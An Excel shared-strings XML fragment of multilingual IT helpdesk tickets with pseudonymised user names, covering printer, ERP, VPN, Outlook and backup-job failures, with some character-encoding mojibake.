    <t>auto output for inwarehouse_tools.  siemens cm 81873983 is set up to auto output inwarehouse_tools to service@company.com however these are not being received in email to trigger on-line invoicing on customer website.</t>
  </si>
  <si>
    <t>DEsowkrH sciejzNE</t>
  </si>
  <si>
    <t>printer problem / issue information - recurring problem</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</si>
  <si>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all printers_x000D_
 _x000D_
   â€¢  detailed description of the problem ?  says has to install a driver.  won't print._x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000D_
      all documents_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?      all systems_x000D_
_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?  no and yes_x000D_
_x000D_
   â€¢  if erp system, which system?   all systems_x000D_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</si>
  <si>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zcor0003; variants plant_271 and rodstock not working in erp</t>
  </si>
  <si>
    <t xml:space="preserve">zcor0003; variants plant_271 and rodstock not working in erp
</t>
  </si>
  <si>
    <t>rpinaqvc hyomubns</t>
  </si>
  <si>
    <t>unable to create a new expense</t>
  </si>
  <si>
    <t>unable to create a new expense as its showing an infotype error.</t>
  </si>
  <si>
    <t>sandir02 (usa,pa):the interface fc9/45 (10.1.102.202)is down since at 9:09 am et on 09/13.</t>
  </si>
  <si>
    <t>inwarehouse_tools were not included to payment proposal</t>
  </si>
  <si>
    <t>account unlocked</t>
  </si>
  <si>
    <t>nhckjuyq esoadhlv</t>
  </si>
  <si>
    <t>ticket update on inplant_859389</t>
  </si>
  <si>
    <t>ctbjdrnf lideywqv</t>
  </si>
  <si>
    <t>call from private number // got disconnected</t>
  </si>
  <si>
    <t>i am not able to connect to my regular printer or any printer.  ts02 on HostName_769</t>
  </si>
  <si>
    <t xml:space="preserve">x5380 </t>
  </si>
  <si>
    <t>company-na-usa-usa-switch-tc02-1-2960-access-sw01.company.com:interface: fastethernet0/3 Â· furnace pc ray jankowski is do</t>
  </si>
  <si>
    <t>company-na-usa-usa-switch-tc02-1-2960-access-sw01.company.com_x000D_
: interface: fastethernet0/3 Â· furnace pc ray jankowski is down.</t>
  </si>
  <si>
    <t>maschinen pc von r241 im bereich kentip lÃ¤sst sich nicht mehr starten;</t>
  </si>
  <si>
    <t>erp probleme</t>
  </si>
  <si>
    <t>wenn ich am rechner evh8114148 im erp eine zeichnung Ã¶ffnen will schlieÃŸt erp. dann muss ich mich neu einloggen._x000D_
es wurden bereits zwei tickets geschrieben. aber das problem wurde bisher nicht behoben.</t>
  </si>
  <si>
    <t>impossible to remove "country of origin" data on inwarehouse_tools for export customer 70202027</t>
  </si>
  <si>
    <t xml:space="preserve">we've made a uacyltoe hxgaycze with xawlkiey demjqrfl in SID_1 - inwarehouse_tool number 0157138137_x000D_
there is also inwarehouse_tool 0159117484 and proforma 0159122287 in SID_34 as examples (please note that english sentences are automatic ones and french are manual ones)._x000D_
on customer master level - classification i checked "no" on print export info, but it doesn't work._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>urgent!!!!!  personnel number not accepted by travel expense manager in erp</t>
  </si>
  <si>
    <t>personnel number not accepted by travel expense manager in erp</t>
  </si>
  <si>
    <t>bgaxwntz biofkvrs</t>
  </si>
  <si>
    <t>HostName_1043:average (4 samples) disk free on c:\ is now 6%</t>
  </si>
  <si>
    <t>zurÃ¼cksetzen auf 12.09.2016</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: cflrqoew.qbgjwaye@gmail.com
hallo
kÃ¶nnen sie mir helfen, die unten gekennzeichnete datenbank plant_113 stock report_daily.xlsx auf den 12.09.16 zurÃ¼ckzusetzen
danke
[cid:image001.png@01d20db4.06570281]
cflrqoew qbgjwaye
process planning
cflrqoew.qbgjwaye@gmail.com&lt;mailto:cflrqoew.qbgjwaye@gmail.com&gt;
company company produktions gmbh &amp; co. kg, geschÃ¤ftsfÃ¼hrer: dr. jofghyuach fabry,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</si>
  <si>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cflrqoew qbgjwaye</t>
  </si>
  <si>
    <t>probleme mit portal \ujtmipzv cwdzunxs</t>
  </si>
  <si>
    <t>zeiterfassung funktioniert nicht \we_qs \qualitÃ¤tsmanagement \xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>scanner metroligic fÃ¼r rechner we_wu160 defekt \zedlet</t>
  </si>
  <si>
    <t>canner metroligic fÃ¼r rechner we_wu160 defekt \zedlet</t>
  </si>
  <si>
    <t>install company barcode fÃ¼r ewew8323504 \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/13/2016 04:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/13/2016 04:13:00</t>
  </si>
  <si>
    <t>repeat print in tips printer</t>
  </si>
  <si>
    <t>aikejxpb xdavwocg</t>
  </si>
  <si>
    <t>HostName_1193 - f:\ label:dat1-HostName_1193 36e52bcd  is over  85% space consumed. space available: 1.4 g</t>
  </si>
  <si>
    <t>qlhmawgi sgwipoxn we_wu160 unlock</t>
  </si>
  <si>
    <t>purchasing freetext requisitions cannot be created</t>
  </si>
  <si>
    <t xml:space="preserve">we are having serious issues with creating shopping cars in purchasing._x000D_
a buyer group of apac is defaulting and not changeable._x000D_
since this buyer group belongs to a different purch. org. it causes an error that cannot be overwritten._x000D_
it seems, this only happens when creating freetext shopping carts._x000D_
we need immediate action on this. _x000D_
no one can create freetext requisitions at all._x000D_
</t>
  </si>
  <si>
    <t>ckmnouwi nxmtkubc</t>
  </si>
  <si>
    <t xml:space="preserve">vip2- outlook not working, asking for password </t>
  </si>
  <si>
    <t>vip2- outlook not working, asking for password. no password prompt is coming up.</t>
  </si>
  <si>
    <t>we need a dn for 5018069717  material 2837572 pcs 25  plant plant_197  thanks</t>
  </si>
  <si>
    <t xml:space="preserve">we need a dn for 5018069717  material 2837572 pcs 25  plant plant_197  </t>
  </si>
  <si>
    <t>can not access in SID_1</t>
  </si>
  <si>
    <t>fehler bei bestellung in -purchasing- katalog</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: pltkqrfd.bfohnjmz@gmail.com
guten morgen,
wie eben mit hotline besprochen, sende ich die fehlermeldung die beim einkaufen in purchasing katalog erscheint.
[cid:hardcopy-cid]
contact :</t>
  </si>
  <si>
    <t>need cute pdf installed.</t>
  </si>
  <si>
    <t>vgptfdqw yjqeridp</t>
  </si>
  <si>
    <t xml:space="preserve">from: yuxloigj tzfwjxhe _x000D_
sent: tuesday, september 13, 2016 10:50 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: re: action required: please connect to the new vpn url before january 30_x000D_
_x000D_
hello:_x000D_
_x000D_
my vpn is not working.  kindly help.  </t>
  </si>
  <si>
    <t>cyzonilx jyhutqpd</t>
  </si>
  <si>
    <t>user tfazwrdv upwonzvdâ€™s pc name has been changed to atcl8316840 (old pc name : atclx205739)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sthyuraj.sektyhar@company.com_x000D_
_x000D_
user tfazwrdv upwonzvd's pc name has been changed to atcl8316840 (old pc name : atclx205739)_x000D_
user wants this to be updated in telephony_software system for i3 updates_x000D_
_x000D_
_x000D_
_x000D_
from: may yi &lt;zupifghd.vdqxepun@gmail.com&lt;mailto:zupifghd.vdqxepun@gmail.com&gt;&gt;_x000D_
date: 13 september 2016 at 09:29:08 gmt+5:30_x000D_
to: rajyutyi kuttiadi &lt;xezjvnyr.hmjwknxs@gmail.com&lt;mailto:xezjvnyr.hmjwknxs@gmail.com&gt;&gt;_x000D_
cc: obuwfnkm ufpwmybi &lt;obuwfnkm.ufpwmybi@gmail.com&lt;mailto:obuwfnkm.ufpwmybi@gmail.com&gt;&gt;, tfazwrdv upwonzvd &lt;tfazwrdv.upwonzvd@gmail.com&lt;mailto:tfazwrdv.upwonzvd@gmail.com&gt;&gt;_x000D_
subject: fw: computer name change in telephony_software_x000D_
hello rajyutyi,_x000D_
could you help to put below stations to company net?_x000D_
_x000D_
user name_x000D_
_x000D_
new pc name/_x000D_
_x000D_
mac address_x000D_
_x000D_
tfazwrdv upwonzvd_x000D_
_x000D_
atcl8316840_x000D_
_x000D_
00:04:f2:90:54:b2_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gasbfqvp.fmvqgjih@gmail.com_x000D_
_x000D_
guten morgen,_x000D_
_x000D_
leider kann ich den kurs nicht absolvieren, da ich keinen zugang bekomme. bis hierher geht's._x000D_
_x000D_
[cid:image001.png@01d20d93.7193c930]_x000D_
_x000D_
mit den besten wÃ¼nschen und grÃ¼ÃŸen_x000D_
_x000D_
gasbfqvp fmvqgjih_x000D_
designer, product engineering â€“ wear solutions_x000D_
company shared services gmbh_x000D_
_x000D_
tel.: +49 (0) 9279 - 80 - 121_x000D_
fax   +49 (0) 9279 - 80 â€“ 220_x000D_
mobil +49 (0) 151 - 57634082_x000D_
_x000D_
e- mail adresse: gasbfqvp.fmvqgjih@gmail.com&lt;mailto:gasbfqvp.fmvqgjih@gmail.com&gt;_x000D_
_x000D_
www.company.com&lt;_x000D_
_x000D_
eckersdorfer straÃŸe 10_x000D_
95490 germany/ bayern/ germany_x000D_
_x000D_
geschÃ¤ftsfÃ¼hrer/managing directors: phvkowml azbtkqwx, naruedlk mpvhakdq_x000D_
_x000D_
sitz/registered office: fÃ¼rth/bay. â€“ registergerirtcht/listed in the court register: fÃ¼rth/bay. hra 7481_x000D_
persÃ¶nlich haftende gesellschafterin/general partner: company deutschland gmbh_x000D_
sitz/registered office: germany. â€“ registergerirtcht/listed in the court register: bad homburg v.d.h. hrb 7492_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>gasbfqvp fmvqgjih</t>
  </si>
  <si>
    <t>i can't do purchase requisition at purchasing - see attachment</t>
  </si>
  <si>
    <t>i can't do purchase requisition at purchasing - see attachment_x000D_
account 81377661 requires a assignment to a co object ! i can't select a byer</t>
  </si>
  <si>
    <t>maiklcjz ltwrfysm</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 09/13/2016 01:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 09/13/2016 01:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">computer can't started </t>
  </si>
  <si>
    <t>zyblacuk mvjqwgzn</t>
  </si>
  <si>
    <t>need to install nvyjtmca xjhpznds applications</t>
  </si>
  <si>
    <t>need to install nvyjtmca xjhpznds applications_x000D_
1) job_scheduler_x000D_
2) backup_tool_x000D_
3) vmware_x000D_
4) vnc viewer_x000D_
_x000D_
while trying to install these applications it is asking for administration access.</t>
  </si>
  <si>
    <t>no new fax-in on ricoh fax folder at company malaysia - public (\\amssm003) (q:)</t>
  </si>
  <si>
    <t xml:space="preserve">we cannot see new fax-in to  "public (\\amssm003) (q:) &gt; ricoh fax folder" since end of august 2016. could you please check and fix if there have been any problems?_x000D_
</t>
  </si>
  <si>
    <t>srpkmdcg skdubtnr</t>
  </si>
  <si>
    <t>outloot  è€æ˜¯æç¤ºè¾“å…¥å¯†ç ï¼Œæ›´æ”¹å¯†ç åŽæ— æ•ˆï¼Œè¯·è½¬å°è´ºã€‚</t>
  </si>
  <si>
    <t>cnxbswhv qmtngeyh</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_search_server_qa_daily failed in job_scheduler at: 09/12/2016 23:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_search_server_qa_daily failed in job_scheduler at: 09/12/2016 23:54:00</t>
  </si>
  <si>
    <t xml:space="preserve">extract file for the request 2626619 </t>
  </si>
  <si>
    <t>extract the file for the request 2626619 using rscrm bapi</t>
  </si>
  <si>
    <t>please help qskwgjym bsqdaxhf delete paramdntyeters and payment run in t-code f110</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37stat failed in job_scheduler at: 09/12/2016 22:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37stat failed in job_scheduler at: 09/12/2016 22:54:00</t>
  </si>
  <si>
    <t>gr error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gkwcxzum.answkqpe@gmail.com_x000D_
_x000D_
dear all_x000D_
_x000D_
would you please help us out ? we can't complete gr for below._x000D_
_x000D_
mm 5119707 qty 108_x000D_
po 5019190021_x000D_
_x000D_
[ì„¤ëª…: cid:image001.png@01d20dac.8cd597f0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>switch down -  company-ap-ind-kirty-coating-2960s-access-sw01 located at india kirty is down since 08:18 pm et on 09/12.</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_tax_interface_dev_daily failed in job_scheduler at: 09/12/2016 22:34:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........          8          _x000D_
  failed disk agents ...........          0          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........          8          _x000D_
  ===========================================      _x000D_
  completed media agents .......          1          _x000D_
  failed media agents ..........          0          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          1          _x000D_
  ===========================================      _x000D_
  mbytes total .................   92176 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          0  _x000D_
_x000D_
job bkwin_tax_interface_dev_daily failed in job_scheduler at: 09/12/2016 22:34:00</t>
  </si>
  <si>
    <t>could you resolve item category error during zfd ordering?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fbvpcytz.nokypgvx@gmail.com_x000D_
_x000D_
hello it team,_x000D_
_x000D_
we are facing item category issue for zfd(free of charge) order so#35900902â€¦now we cannot select item category zklnâ€¦_x000D_
could you please check and resolve the issue?_x000D_
_x000D_
order detail:_x000D_
sales org : 1306_x000D_
so#35900902_x000D_
order type : zfd_x000D_
mm#4855028_x000D_
qty : 10pcs_x000D_
delivery plant : plant_317_x000D_
usage : product lost intrans_x000D_
_x000D_
we cannot select item category "zkln" without error. hence, erp cannot identify this open order. we cannot see this open order at md04 screen._x000D_
[cid:image003.jpg@01d20db0.cf5931a0]_x000D_
_x000D_
[cid:image004.jpg@01d20db0.cf5931a0]_x000D_
_x000D_
[cid:image005.png@01d20db0.6fa42800]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 09/12/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
[major] from: bma@HostName_1302.hq.company.com "lib6_drive3"  time: 9/12/2016 10:01:05 pm_x000D_
[90:51]   /dev/rmt39.1_x000D_
 cannot write to device ([5] i/o error)_x000D_
_x000D_
[critical] from: vbda@HostName_184.hq.company.com "/nfsbackup - hana SID_62 - differential backup"  time: 9/12/2016 10:01:41 pm_x000D_
 received abort request from sm =&gt; aborting._x000D_
_x000D_
session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........          1          _x000D_
  failed disk agents ...........          1          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........          2          _x000D_
  ===========================================      _x000D_
  completed media agents .......          0          _x000D_
  failed media agents ..........          1          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          1          _x000D_
  ===========================================      _x000D_
  mbytes total .................  553296 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          2 _x000D_
_x000D_
_x000D_
job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 09/12/2016 22:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_46filesys failed in job_scheduler at: 09/12/2016 22:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
[major] from: bma@HostName_1302.hq.company.com "lib6_drive2"  time: 9/12/2016 10:01:08 pm_x000D_
[90:51]   /dev/rmt51.1_x000D_
 cannot write to device ([5] i/o error)_x000D_
_x000D_
[critical] from: vbda@HostName_229.hq.company.com "HostName_229-bk.hq.company.com [/usr/erp]"  time: 9/12/2016 10:01:44 pm_x000D_
 received abort request from sm =&gt; aborting._x000D_
_x000D_
session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........         22          _x000D_
  failed disk agents ...........          2          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........         24          _x000D_
  ===========================================      _x000D_
  completed media agents .......          0          _x000D_
  failed media agents ..........          1          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          1          _x000D_
  ===========================================      _x000D_
  mbytes total .................   44876 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          4  _x000D_
_x000D_
job SID_46filesys failed in job_scheduler at: 09/12/2016 22:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_38filesys failed in job_scheduler at: 09/12/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
_x000D_
session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........         24          _x000D_
  failed disk agents ...........          2          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........         26          _x000D_
  ===========================================      _x000D_
  completed media agents .......          0          _x000D_
  failed media agents ..........          1          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          1          _x000D_
  ===========================================      _x000D_
  mbytes total .................   73883 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          4  _x000D_
_x000D_
job SID_38filesys failed in job_scheduler at: 09/12/2016 22:02:00</t>
  </si>
  <si>
    <t>lnssm005: shop_floor_app application is down on 9/12/2016 at 1:07 pm</t>
  </si>
  <si>
    <t>the shop_floor_app is reporting a : unreachable status on, lnssm005. please investigate</t>
  </si>
  <si>
    <t>is SID_34 down?  i keep receiving a balancing error.</t>
  </si>
  <si>
    <t>nzaghmdr sgdlajvw</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: udetjzmn.ayueswcm@gmail.com_x000D_
_x000D_
good evening_x000D_
_x000D_
i have lost my vpn login icon. can this be reinstated?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>skype and outlook not launching.</t>
  </si>
  <si>
    <t>skype and outlook not launching.
-connected to the user system using teamviewer.
had the user connectt to the company vpn.
-deleted rsa files and help the user login to the skype.
-tried to reconfigure the mscrm ,no go.
-tried to repair the ms office.
reinstalled the ms office.
-caller confirmed that he is now able to see the emails on outlook.
-issue resolved.
-computer : lmsl9516645
contact:</t>
  </si>
  <si>
    <t>HostName_1193  - status f:\  is now 86% utilized.</t>
  </si>
  <si>
    <t>HostName_1193  - status f:\ label:dat1-HostName_1193 36e52bcd  is now 86% utilized.</t>
  </si>
  <si>
    <t>HostName_894  - status c:\  is now 88% utilized.</t>
  </si>
  <si>
    <t>HostName_894  - status c:\ label:sys-HostName_894 28385a7b is now 88% utilized.</t>
  </si>
  <si>
    <t xml:space="preserve">static on call </t>
  </si>
  <si>
    <t xml:space="preserve">changes made for ticket inc1545346 have caused issues with delivery printing at plant_268. </t>
  </si>
  <si>
    <t xml:space="preserve">changes made for ticket inc1545346 have caused issues with delivery printing at plant_268. plant_151 reconditioning facility is now located at the plant_268 facility in illinois, usa.  there were changes made to pick request printing for this group of employees but it has affected the entire facility.  the plant_268 group used to print delivery notes at the users paramdntyeter.  now all delivery notes are printing at an office printer that is not near where they are working. this is not productive. please reach out to omiwzbue auvolfhp and myself to help resolve this as soon as possible.  </t>
  </si>
  <si>
    <t>invalid incompletion error on so#24903890</t>
  </si>
  <si>
    <t>so#35014901 has "configuration" incompletion for items 10-40 which is invalid. these items are complete and error should not be there</t>
  </si>
  <si>
    <t xml:space="preserve">not properly acess - excel, word,skype,outlook - message &gt; products disabled to continue to use, activate now </t>
  </si>
  <si>
    <t xml:space="preserve">if i try to use excel, word, skype,outlook have a message products disabled to continue to use, activate now . if i tried to do using e-mail account , i have the message : account jgnxyahz.cixzwuyf@gmail.com is not associated with the product . to active the installation , please enter the account associated with the product </t>
  </si>
  <si>
    <t xml:space="preserve">downloading archiving_tool software for erp SID_34 </t>
  </si>
  <si>
    <t xml:space="preserve">from: lkwspqce knxaipyj [mailto:lkwspqce.knxaipyj@gmail.com] _x000D_
sent: monday, september 12, 2016 3:30 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: amar - support in installing archiving_tool to allowe me view vendor inwarehouse_tools_x000D_
_x000D_
hello,_x000D_
_x000D_
can i please have support in downloading archiving_tool software for erp SID_34 to allow me access and view vendor inwarehouse_tools._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lkwspqce knxaipyj</t>
  </si>
  <si>
    <t>hana report will not refresh - analysis buttons all deactivated - high priority</t>
  </si>
  <si>
    <t>see attached workbook required to be refreshed for msc requirement.</t>
  </si>
  <si>
    <t>please reset my erp pasword, battel to log in-username  bragtydlc, thanks</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gvderpbx.udrzjxkm@gmail.com
gvderpbx udrzjxkm
junior application sales engineer
gvderpbx.udrzjxkm@gmail.com&lt;mailto:gvderpbx.udrzjxkm@gmail.com&gt;
</t>
  </si>
  <si>
    <t>rma receiving issue with items under 1 lb.  rma 7112611859 has two items 21.5 and 4.76</t>
  </si>
  <si>
    <t xml:space="preserve">name:debhyue fhyuiinch
language:
browser:microsoft internet explorer
email:yoltmegh.bmadvixs@gmail.com
customer number:
telephone:
summary:rma receiving issue with items under 1 lb.  rma 7112611859 has two items 21.5 and 4.76 and when we try to receive items in under mm 7228874.  erp is doing a round up value to 5 lbs and 22 lbs.  is there a way to receive exact weight in?  
</t>
  </si>
  <si>
    <t>please help  brianna get working again on business manager</t>
  </si>
  <si>
    <t>eqrknylx nqpsjhwc</t>
  </si>
  <si>
    <t>tnghnha ajuiegrson is in need of having access to the met lab computer to be able to perform her job.</t>
  </si>
  <si>
    <t>yjcrdmin jmizcfso</t>
  </si>
  <si>
    <t>enterprise search - no results</t>
  </si>
  <si>
    <t xml:space="preserve">the following objects/search connectors in enterprise search are not returning any results:_x000D_
material_x000D_
material bom_x000D_
specification_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>accrual values are not matching in the compensation system</t>
  </si>
  <si>
    <t>there is a bug in the performance sproc that calculates payout values. a small modification needs to occur in order to calculate payout values on a monthly basis. this was missed during uacyltoe hxgayczeing due to uacyltoe hxgayczeing taking place in the first period of a financial_toolcal year. this issue only arises in subsequent periods.</t>
  </si>
  <si>
    <t>cbmryjid nkcmvwgi</t>
  </si>
  <si>
    <t>not able to create delivery for sto 5019168696/4908100506</t>
  </si>
  <si>
    <t xml:space="preserve">not able to create delivery for sto 5019168696/4908100506 - _x000D_
could you please verify apo ? _x000D_
please assing to supply_chain group _x000D_
</t>
  </si>
  <si>
    <t>skype sound not working.</t>
  </si>
  <si>
    <t>skype sound not working._x000D_
-connected to the user system using teamviewer._x000D_
-installed the sound drivers._x000D_
-restarted the pc._x000D_
-gave a uacyltoe hxgaycze call, user able to hear  sound clearly._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1343 failed in job_scheduler at: 09/12/2016 13:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1343 failed in job_scheduler at: 09/12/2016 13:22:00</t>
  </si>
  <si>
    <t>xeucniqa dwpsevof</t>
  </si>
  <si>
    <t xml:space="preserve">tax not calculated </t>
  </si>
  <si>
    <t xml:space="preserve">from: raghyvhdra najuty _x000D_
sent: monday, september 12, 2016 6:33 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: srinfhyath araghtyu; parthyrubhji erathyur_x000D_
subject: trurthyuft - re: tax not calculated_x000D_
_x000D_
hello,_x000D_
_x000D_
please note  material has reached along with  excise inwarehouse_tool without vat w.r.t  to inwarehouse_tools  _x000D_
_x000D_
1) 0512673537 dt.31.08.2016_x000D_
2) 0512669241 dt 22.08.2016_x000D_
3) 0512673538 dt 22.08.2016_x000D_
</t>
  </si>
  <si>
    <t>need to configure emails on the company iphone device</t>
  </si>
  <si>
    <t>erp queries</t>
  </si>
  <si>
    <t>esuizcrh nytvhmbq</t>
  </si>
  <si>
    <t xml:space="preserve">unlocked erp SID_34 </t>
  </si>
  <si>
    <t>slrgconp onukdesq</t>
  </si>
  <si>
    <t>need full control access to \\HostName_768\teams\consigned inventory</t>
  </si>
  <si>
    <t>ncuwyeib plnzhxvc</t>
  </si>
  <si>
    <t>unable to end out an email</t>
  </si>
  <si>
    <t xml:space="preserve">emailed some steps, awaiting uacyltoe hxgayczeing.
from: nwfodmhc exurcwkm 
sent: monday, september 12, 2016 8:22 pm
to: shhkioaprhkuoash ms &lt;peuckbvr.tjihmgsv@gmail.com&gt;
subject: fw: fw: fw: engineering_drawing_tool automation
hi shiv,
please see if removing the names from your outlook cache fixes the issue.
to do this please type the name of the recipient, you will find a 'x' next to the name. click on it to remove from the cache. open a new email and type out the complete email address and uacyltoe hxgaycze if you are able to send the email.
</t>
  </si>
  <si>
    <t>i am having issues delivering parts to stock in another plant. the rqfhiong zkwfqagb has deliver plant of plant_36</t>
  </si>
  <si>
    <t>i am having issues delivering parts to stock in another plant. the rqfhiong zkwfqagb has deliver plant of plant_36 but it will not deliver there.
ext.2296
summary:i am having issues delivering parts to stock in another plant. the rqfhiong zkwfqagb has deliver plant of plant_36 but it will not deliver there.</t>
  </si>
  <si>
    <t>could not hear user from other side.</t>
  </si>
  <si>
    <t>could not hear user from other side._x000D_
phone issue.</t>
  </si>
  <si>
    <t>users are unable to connect to the network drives in HostName_1274</t>
  </si>
  <si>
    <t>users are unable to connect to the network drives in HostName_1274, the server is also not reachable.</t>
  </si>
  <si>
    <t xml:space="preserve">from: puxsvfwr cwkjruni _x000D_
sent: monday, september 12, 2016 12:23 pm_x000D_
to: nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt;_x000D_
subject: sab: wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000D_
importance: high_x000D_
_x000D_
_x000D_
hi can you please activate my mobile devise to recieve emails on my new business iphone._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2063c failed in job_scheduler at: 09/12/2016 10:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2063c failed in job_scheduler at: 09/12/2016 10:38:00</t>
  </si>
  <si>
    <t>yzbqwpat fdjrctbu</t>
  </si>
  <si>
    <t>feiozqbd uwljchaf</t>
  </si>
  <si>
    <t>unable to connect wireless on the laptop</t>
  </si>
  <si>
    <t>nouivdea boiypjvx</t>
  </si>
  <si>
    <t xml:space="preserve">urgent : with reference to ticket : inc1549876 </t>
  </si>
  <si>
    <t xml:space="preserve">uyjlodhq ymedkatw (lghuiezj3) has mapped the units m (departments), n (public) and s (teams) to HostName_614 incorrectly.
helped her mapping network drive to correctly : inc1549876 
but after reboot computer is connecting back to kkbsm003 instead of HostName_622
she should have access m drive n drive and s drive with this server  HostName_622
pc name: ekxw8111221
please help update login script for user jÃ©sica lÃ³pez rufo.
also, user requested to process this request as soon as possible  as her daily work is getting hampered and its very urgent for her.
</t>
  </si>
  <si>
    <t>cxqldoub vkgpatsu</t>
  </si>
  <si>
    <t>vpn access pc name : aidl8912285  user id : thhyuokhkp</t>
  </si>
  <si>
    <t xml:space="preserve">vpn access pc name : aidl8912285 </t>
  </si>
  <si>
    <t>out of office for at least next 3 months. need  password reset for the mails.</t>
  </si>
  <si>
    <t>yawbtfjc krypjxnd</t>
  </si>
  <si>
    <t>outlook not loading</t>
  </si>
  <si>
    <t xml:space="preserve">no response from other side : german call </t>
  </si>
  <si>
    <t>removing another mail box from outlook</t>
  </si>
  <si>
    <t>wpgxtnks opizcfle</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: anpocezt.qturbxsg@gmail.com_x000D_
_x000D_
hello_x000D_
when i try to get on to erp search and explorer analytics a blank screen comes up (below) are we having problems_x000D_
</t>
  </si>
  <si>
    <t>need to contact keyhtyvin toriaytun</t>
  </si>
  <si>
    <t>ltqhgdbf qtgprmsh</t>
  </si>
  <si>
    <t>erp customer ref not on delivery</t>
  </si>
  <si>
    <t xml:space="preserve">hoi,_x000D_
_x000D_
view attached 2 examples where the customer ref as entered in erp is not printing on delivery's for 1207 sales org. also printscreen from order wikfnmlwds wmtiruac attached._x000D_
_x000D_
this might also be the case in other sales org's. please also check 1202 , 1206 , 1225, 1227, 1241, 1278_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ugtzkvps crnmtjsv</t>
  </si>
  <si>
    <t>please set field services collaboration_platform page to include collaboration_platform meeting section as you had explained</t>
  </si>
  <si>
    <t>password manager error , failed to log-inn. now i'm blocked , please reset</t>
  </si>
  <si>
    <t xml:space="preserve">my phone : </t>
  </si>
  <si>
    <t>the printout of shipament lable is not working</t>
  </si>
  <si>
    <t>name:frafhyuo ajuyanni
language:
browser:microsoft internet explorer
email:dmqjhrso.gzbunwie@gmail.com
customer number:
telephone:
summary:hello, i'm frafhyuo ajuyanni from company italy.
